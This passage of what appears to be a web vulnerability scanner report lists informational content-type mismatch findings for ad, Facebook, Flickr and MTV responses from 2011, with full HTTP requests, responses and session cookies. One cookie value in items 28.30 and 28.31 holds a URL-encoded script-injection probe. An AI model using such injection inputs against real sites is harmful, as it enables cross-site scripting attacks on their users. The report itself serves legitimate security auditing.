28.20. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC; /SO=:463:; /ad21868.12106=,CFC,GFC; /PC=2; /SC=2-33A.2

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:19:27 GMT
Content-Length: 137
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /PC=3; path=/; expires=Tue, 21-Jun-2011 00:19:26 GMT
Set-Cookie: /SC=3-33A.3; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

28.21. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC; /ad21868.12106=,CFC,GFC; /SO=:463:; /PC=1; /SC=1-33A.1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:18:14 GMT
Content-Length: 137
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /PC=2; path=/; expires=Tue, 21-Jun-2011 00:18:13 GMT
Set-Cookie: /SC=2-33A.2; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

28.22. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /SO=:463:; /ad21868.12106=,CFC,GFC; /PC=3; /SC=3-33A.3; /VTS.12067=2ujXm.pD3Q; /ad21868.12067=,CFC,GFC

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:28:12 GMT
Content-Length: 138
Connection: close
Set-Cookie: /ad21868.11567=,CFC,GFC; path=/
Set-Cookie: /PC=4; path=/; expires=Tue, 21-Jun-2011 00:28:12 GMT
Set-Cookie: /SC=4-33A.3^2vc.1; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=374650/site=mtv.mtvi/aamsz=300x250\"></SCR'+'IPT>');

28.23. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; /PC=0; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:15:07 GMT
Content-Length: 529
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /SO=:463:; path=/
Set-Cookie: /PC=1; path=/; expires=Tue, 21-Jun-2011 00:15:06 GMT
Set-Cookie: /SC=1-33A.1; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

document.write('<img src="http://b.scorecardresearch.com/b?C1=8
...[SNIP]...
28.24. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=null&extern=0&channel=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=280x80

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.159.117
X-Cnection: close
Date: Tue, 14 Jun 2011 00:19:08 GMT
Content-Length: 22

Invalid Application ID
28.25. http://www.flickr.com/fragment.gne  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flickr.com
Path:   /fragment.gne

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /fragment.gne?name=inc_language_selector HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:13 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:13 GMT; path=/; domain=.flickr.com
X-Served-By: www116.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r21.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r22.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 1481

       <ul>
           <li><a href="/change_language.gne?lang=zh-hk&magic_cookie=627772737f8cc7615c9c893fe0d08b9d" class="image_link" id="lang_zh-hk"><img src="http://l.yimg.com/g/images/spaceout.gif" width="45" h
...[SNIP]...
28.26. http://www.forexfactory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.forexfactory.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:02:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 30 Mar 2009 19:37:00 GMT
ETag: "886025-3aee-4665b34c18f00"
Accept-Ranges: bytes
Content-Length: 15086
Content-Type: text/plain; charset=UTF-8

............ .h...6... .... .........00.... ..%..F...(....... ..... .........#...#.....................................................................................................................
...[SNIP]...
28.27. http://www.livewithoscar.com/CuteSoft_Client/CuteEditor/Load.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.livewithoscar.com
Path:   /CuteSoft_Client/CuteEditor/Load.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /CuteSoft_Client/CuteEditor/Load.ashx?type=scripts&file=Gecko_Implementation&getModified=1 HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
Content-Length: 0
Origin: http://www.livewithoscar.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.4.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:29 GMT
Content-Length: 14

20110519163030
28.28. http://www.mtv.com/global/music/images/WDK3/btn-add-to-favorites.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mtv.com
Path:   /global/music/images/WDK3/btn-add-to-favorites.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /global/music/images/WDK3/btn-add-to-favorites.jpg HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Sat, 23 Jan 2010 00:13:15 GMT
ETag: "333f180-4b3-47dc9cd69bcc0"
Accept-Ranges: bytes
Content-Length: 1203
Content-Type: image/jpeg
Cache-Control: max-age=1800
Date: Tue, 14 Jun 2011 00:19:37 GMT
Connection: close

GIF89ah.$...................===...zzznnnJJJWWW...XXX......;;;...fffaaa...............rrr...eee222444...333...!.......,....h.$.....'N.e.h..l..p.N...._9...S.G$..?a..<.!...B.R......r...U\..+Y...=W(nmx..
...[SNIP]...
28.29. http://www.mtv.com/global/music/modules/followUs/js/home.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mtv.com
Path:   /global/music/modules/followUs/js/home.jhtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /global/music/modules/followUs/js/home.jhtml HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; __cs_rr=1; ak-mobile-detected=no; mbox=check#true#1308010557|session#1308010496673-477284#1308012357

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: b24b5cf118bfa33f2a875526acc157fd
Last-Modified: Mon, 13 Jun 2011 23:53:07 GMT
Content-Type: text/html
Content-Length: 1326
Cache-Control: max-age=422
Date: Tue, 14 Jun 2011 00:14:59 GMT
Connection: close
Vary: Accept-Encoding

var documentBuffer = "<div class=\"mdl mdl_followUs\"><div class=\"h-wrap group\"><h2 class=\"h-sub2 group\"><span>Follow MTV</span></h2></div><ol class=\"lst photo-alt followUs followUsHome\"> <li st
...[SNIP]...
28.30. http://www.mtv.com/global/music/scripts/includes/geo.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mtv.com
Path:   /global/music/scripts/includes/geo.jhtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /global/music/scripts/includes/geo.jhtml HTTP/1.1
Host: www.mtv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: mtvn_guid=1307964874-137; __qca=P0-450113519-1307964874594; __cs_rr=1; s_ppv=26; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D858%253Bdemo%253D857%253Bdemo%253D856%253Bdemo%253D850%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775; s_cc=true; s_sq=viamtv%3D%2526pid%253Dhttp%25253A%25252F%25252Fhollywoodcrush.mtv.com%25252Ffavicon.ico4bc7e%2525253C%25252Fscript%2525253E%2525253Cscript%2525253Ealert(%25252522FAVICON%25252522)%2525253C%25252Fscript%2525253E4e5acb99ae0%2526oid%253Dhttp%25253A%25252F%25252Fwww.mtv.com%25252Fontv%25252F%2526ot%253DA; ak-mobile-detected=no

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 537
Content-Type: text/html
ETag: cbe91df699c45787d2fcbbfd68fd5d6
Vary: Accept-Encoding
MTVi-Edge-control: bust-downstream
Date: Mon, 13 Jun 2011 17:45:29 GMT
Connection: close
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:03 GMT


function InitCurrentTime() {

this.now = "201106131345";

this.rawTime = this.now;

if(this.now.indexOf("esi") > -1) {this.now = "201001111742"; }//var this.now = "01-11-2010 17:59";

...[SNIP]...
28.31. http://www.mtv.com/global/scripts/special/projx.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mtv.com
Path:   /global/scripts/special/projx.jhtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /global/scripts/special/projx.jhtml?channelname=MTV HTTP/1.1
Host: www.mtv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: mtvn_guid=1307964874-137; __qca=P0-450113519-1307964874594; __cs_rr=1; s_ppv=26; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D858%253Bdemo%253D857%253Bdemo%253D856%253Bdemo%253D850%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775; s_cc=true; s_sq=viamtv%3D%2526pid%253Dhttp%25253A%25252F%25252Fhollywoodcrush.mtv.com%25252Ffavicon.ico4bc7e%2525253C%25252Fscript%2525253E%2525253Cscript%2525253Ealert(%25252522FAVICON%25252522)%2525253C%25252Fscript%2525253E4e5acb99ae0%2526oid%253Dhttp%25253A%25252F%25252Fwww.mtv.com%25252Fontv%25252F%2526ot%253DA; ak-mobile-detected=no; mbox=check#true#1307987191|session#1307987130821-992336#1307988991

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: 5bd85b90fbc2c4e8961664fffa70d691
Vary: Accept-Encoding
Cache-Control: max-age=2416
Date: Mon, 13 Jun 2011 17:45:34 GMT
Content-Length: 10009
Connection: close

var projX = {};

projX.repeat = false;
projX.test = false;

projX.displayEventPre = function(){ return true;};
projX.displayEventPost = function(){};
projX.closeEvent = function(){};

projX.layerindex
...[SNIP]...
28.32. http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mtv.com
Path:   /shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; mbox=check#true#1308010557|session#1308010496673-477284#1308012357; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 09 Jun 2011 16:37:10 GMT
ETag: "392ca88-1951-4a54a10829980"
Accept-Ranges: bytes
Content-Length: 6481
Content-Type: image/jpeg
Cache-Control: max-age=1800
Date: Tue, 14 Jun 2011 00:15:29 GMT
Connection: close

GIF89a..Z....l7..P...............H4
SSRddc762...oX%.xA.I.6'.T0WiM............n~c/........O........{WB.................._..k.......................b..f..t.......t....EE;.........%..~u?....\+..~.....F.
...[SNIP]...
28.33. http://yadvertisingblog.app3.hubspot.com/salog.js.aspx  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://yadvertisingblog.app3.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: yadvertisingblog.app3.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 14 Jun 2011 00:20:27 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=flqSVfpIzQEkAAAAMzA1NzIxYjgtYzlkNC00NWY4LWI3OWQtZjRiMDhkYWUwZTI30; expires=Wed, 13-Jun-2012 00:20:27 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=2a914746-9765-436b-a58d-940ead33ec3a; domain=yadvertisingblog.app3.hubspot.com; expires=Sun, 13-Jun-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT159=487658668.0.0000; path=/
Content-Length: 498


var hsUse20Servers = true;
var hsDayEndsIn = 13172;
var hsWeekEndsIn = 531572;
var hsMonthEndsIn = 1481972;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-06-13 20:20
...[SNIP]...
29. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /st?_PVID=C73MEWKL8NLm3NorTdAdCwlBrcHW8032GokADnJu&ad_type=iframe&ad_size=300x250&site=1048402&section_code=14559668&cb=1307974281991642&zip=05672&ycg=&yyob=&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15niv0lpu/M=715481.14559668.14376714.13960104/D=my/S=150001785:LREC/Y=YAHOO/EXP=1307981481/L=C73MEWKL8NLm3NorTdAdCwlBrcHW8032GokADnJu/B=8hpRDWKL5M8-/J=1307974281991642/K=gRvxSKzfqEbroTIaTR.s5w/A=6273326/R=0/* HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/darla/md.php?en=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!'!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!(["; 